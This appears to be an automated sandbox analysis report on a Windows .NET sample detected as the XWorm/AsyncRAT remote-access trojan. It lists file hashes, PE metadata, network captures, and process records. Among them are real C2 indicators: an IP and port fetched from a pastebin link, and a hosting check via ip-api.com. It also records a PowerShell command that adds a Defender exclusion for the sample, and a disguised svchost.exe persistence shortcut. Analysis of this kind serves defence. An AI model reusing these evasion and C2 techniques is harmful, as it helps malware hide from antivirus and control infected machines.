                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\a9YMw44iQq.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 6 20:51:52 2024, mtime=Fri Dec 6 20:51:52 2024, atime=Fri Dec 6 20:51:52 2024, length=82944, window=hide
                                                            Category:dropped
                                                            Size (bytes):663
                                                            Entropy (8bit):4.600576133932817
                                                            Encrypted:false
                                                            SSDEEP:12:8MlEsc+sWFPQbeAVZhnpEjAfFIsbdytaz6mV:8kfIb5ZhnpQAxdy5m
                                                            MD5:45004BDFD1304FDE846D4857036E42DE
                                                            SHA1:936A0B60225349714B1AB95FB3300A15EC6AD290
                                                            SHA-256:147D93165BA019E68B4C939B49817E2AB68F89E449E6DB7C6EC051FA58F8C6DE
                                                            SHA-512:B16E420879DEBF0B0E65DA3BADB496BC167EC68E5D3896E5B49551C3465E969492AF978B51827402D68636329CBBF20105285AAFF4C64416EDAEED4A8F3A4641
                                                            Malicious:false
                                                            Preview:L..................F.... ......)H......)H......)H...D...........................P.O. .:i.....+00.../C:\...................`.1......YZ.. PROGRA~3..H......O.I.YZ.....g......................AR.P.r.o.g.r.a.m.D.a.t.a.....b.2..D...Y{. svchost.exe.H......Y{..Y{...........................T_..s.v.c.h.o.s.t...e.x.e.......I...............-.......H............zg?.....C:\ProgramData\svchost.exe..2.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.s.v.c.h.o.s.t...e.x.e.`.......X.......051829...........hT..CrF.f4... .Wt.B.....-...-$..hT..CrF.f4... .Wt.B.....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):5.938591313720819
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:a9YMw44iQq.exe
                                                            File size:82'944 bytes
                                                            MD5:f068a2f351d11284fee8d768a64f6c9c
                                                            SHA1:6fcba43b6b6024c8795d699f638444654714c276
                                                            SHA256:4854a1611616f474d7241dc0268f913f92887a383a81e2dba1186c358cf93f22
                                                            SHA512:856c01cfbde2b8a41564a77f07b5561d69679da6a0af8da86d6dc869309d04cabac0a06c37560456e8bf6dfa0f04e342b57f2afbcb5ddbf4d0bbe06944387ff2
                                                            SSDEEP:1536:NfFb0NWmGRk7di8n/7IbDqS8a1gMGT6tVOUVprKsZ:NBrk7dHIbDMMJVOUVpdZ
                                                            TLSH:AF837C6837F50115F1FF9FB54DE57252CE39BA631503E21F2486068A1B23A89CE907FA
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.Rg.................:...........X... ...`....@.. ....................................@................................
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x41580e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6752A62A [Fri Dec 6 07:22:18 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x157bc0x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x4e6.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x138140x13a008c409eb00004c08f9cf0ce504e7c270fFalse0.5831881966560509SysEx File - Acoustic tech. lab.6.002880993020355IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x160000x4e60x60022e5b3e865386376fe448e03e99e0210False0.37890625data3.7736123929968417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x180000xc0x2005daf18d07c1af61dbe95d1e3337735a4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x160a00x25cdata0.46192052980132453
                                                            RT_MANIFEST0x162fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-06T22:52:08.141883+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.6498195.166.171.545552TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 6, 2024 22:51:03.165565014 CET4970780192.168.2.6208.95.112.1
                                                            Dec 6, 2024 22:51:03.285433054 CET8049707208.95.112.1192.168.2.6
                                                            Dec 6, 2024 22:51:03.285573959 CET4970780192.168.2.6208.95.112.1
                                                            Dec 6, 2024 22:51:03.286602974 CET4970780192.168.2.6208.95.112.1
                                                            Dec 6, 2024 22:51:03.407682896 CET8049707208.95.112.1192.168.2.6
                                                            Dec 6, 2024 22:51:04.395129919 CET8049707208.95.112.1192.168.2.6
                                                            Dec 6, 2024 22:51:04.444439888 CET4970780192.168.2.6208.95.112.1
                                                            Dec 6, 2024 22:51:53.407927990 CET49812443192.168.2.6172.67.19.24
                                                            Dec 6, 2024 22:51:53.407998085 CET44349812172.67.19.24192.168.2.6
                                                            Dec 6, 2024 22:51:53.408072948 CET49812443192.168.2.6172.67.19.24
                                                            Dec 6, 2024 22:51:53.418723106 CET49812443192.168.2.6172.67.19.24
                                                            Dec 6, 2024 22:51:53.418773890 CET44349812172.67.19.24192.168.2.6
                                                            Dec 6, 2024 22:51:54.637290001 CET44349812172.67.19.24192.168.2.6
                                                            Dec 6, 2024 22:51:54.637474060 CET49812443192.168.2.6172.67.19.24
                                                            Dec 6, 2024 22:51:54.639420033 CET49812443192.168.2.6172.67.19.24
                                                            Dec 6, 2024 22:51:54.639436960 CET44349812172.67.19.24192.168.2.6
                                                            Dec 6, 2024 22:51:54.639687061 CET44349812172.67.19.24192.168.2.6
                                                            Dec 6, 2024 22:51:54.682162046 CET49812443192.168.2.6172.67.19.24
                                                            Dec 6, 2024 22:51:54.723336935 CET44349812172.67.19.24192.168.2.6
                                                            Dec 6, 2024 22:51:55.456990004 CET44349812172.67.19.24192.168.2.6
                                                            Dec 6, 2024 22:51:55.457091093 CET44349812172.67.19.24192.168.2.6
                                                            Dec 6, 2024 22:51:55.457149029 CET49812443192.168.2.6172.67.19.24
                                                            Dec 6, 2024 22:51:55.464077950 CET49812443192.168.2.6172.67.19.24
                                                            Dec 6, 2024 22:51:55.658900976 CET498195552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:51:55.779959917 CET5552498195.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:51:55.780040026 CET498195552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:51:55.843072891 CET498195552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:51:55.962853909 CET5552498195.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:08.141882896 CET498195552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:08.261718035 CET5552498195.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:08.487435102 CET8049707208.95.112.1192.168.2.6
                                                            Dec 6, 2024 22:52:08.487508059 CET4970780192.168.2.6208.95.112.1
                                                            Dec 6, 2024 22:52:17.697577000 CET5552498195.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:17.697669029 CET498195552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:19.508404016 CET498195552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:19.510521889 CET498765552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:19.628319979 CET5552498195.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:19.630286932 CET5552498765.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:19.630367994 CET498765552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:19.666707039 CET498765552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:19.786835909 CET5552498765.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:33.445259094 CET498765552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:33.565373898 CET5552498765.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:41.541754007 CET5552498765.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:41.541837931 CET498765552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:41.690944910 CET498765552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:41.722354889 CET499235552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:41.810880899 CET5552498765.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:41.842273951 CET5552499235.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:41.842340946 CET499235552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:41.958240986 CET499235552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:42.078116894 CET5552499235.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:52:44.418831110 CET4970780192.168.2.6208.95.112.1
                                                            Dec 6, 2024 22:52:44.538633108 CET8049707208.95.112.1192.168.2.6
                                                            Dec 6, 2024 22:52:52.195672035 CET499235552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:52:52.315463066 CET5552499235.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:53:02.305053949 CET499235552192.168.2.65.166.171.54
                                                            Dec 6, 2024 22:53:02.425018072 CET5552499235.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:53:03.745606899 CET5552499235.166.171.54192.168.2.6
                                                            Dec 6, 2024 22:53:03.745793104 CET499235552192.168.2.65.166.171.54
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 6, 2024 22:51:03.012337923 CET6013053192.168.2.61.1.1.1
                                                            Dec 6, 2024 22:51:03.156701088 CET53601301.1.1.1192.168.2.6
                                                            Dec 6, 2024 22:51:53.269632101 CET6514553192.168.2.61.1.1.1
                                                            Dec 6, 2024 22:51:53.406944036 CET53651451.1.1.1192.168.2.6
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 6, 2024 22:51:03.012337923 CET192.168.2.61.1.1.10xfa90Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Dec 6, 2024 22:51:53.269632101 CET192.168.2.61.1.1.10x4bdbStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 6, 2024 22:51:03.156701088 CET1.1.1.1192.168.2.60xfa90No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 22:51:53.406944036 CET1.1.1.1192.168.2.60x4bdbNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 22:51:53.406944036 CET1.1.1.1192.168.2.60x4bdbNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 22:51:53.406944036 CET1.1.1.1192.168.2.60x4bdbNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            • pastebin.com
                                                            • ip-api.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.649707208.95.112.1806216C:\Users\user\Desktop\a9YMw44iQq.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 6, 2024 22:51:03.286602974 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                            Host: ip-api.com
                                                            Connection: Keep-Alive
                                                            Dec 6, 2024 22:51:04.395129919 CET175INHTTP/1.1 200 OK
                                                            Date: Fri, 06 Dec 2024 21:51:03 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 6
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 66 61 6c 73 65 0a
                                                            Data Ascii: false


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.649812172.67.19.244436216C:\Users\user\Desktop\a9YMw44iQq.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-06 21:51:54 UTC74OUTGET /raw/vJmE27fr HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-12-06 21:51:55 UTC391INHTTP/1.1 200 OK
                                                            Date: Fri, 06 Dec 2024 21:51:55 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Fri, 06 Dec 2024 21:51:55 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8edf800028610c88-EWR
                                                            2024-12-06 21:51:55 UTC23INData Raw: 31 31 0d 0a 35 2e 31 36 36 2e 31 37 31 2e 35 34 3a 35 35 35 32 0d 0a
                                                            Data Ascii: 115.166.171.54:5552
                                                            2024-12-06 21:51:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:16:50:58
                                                            Start date:06/12/2024
                                                            Path:C:\Users\user\Desktop\a9YMw44iQq.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\a9YMw44iQq.exe"
                                                            Imagebase:0x150000
                                                            File size:82'944 bytes
                                                            MD5 hash:F068A2F351D11284FEE8D768A64F6C9C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:16:51:03
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'
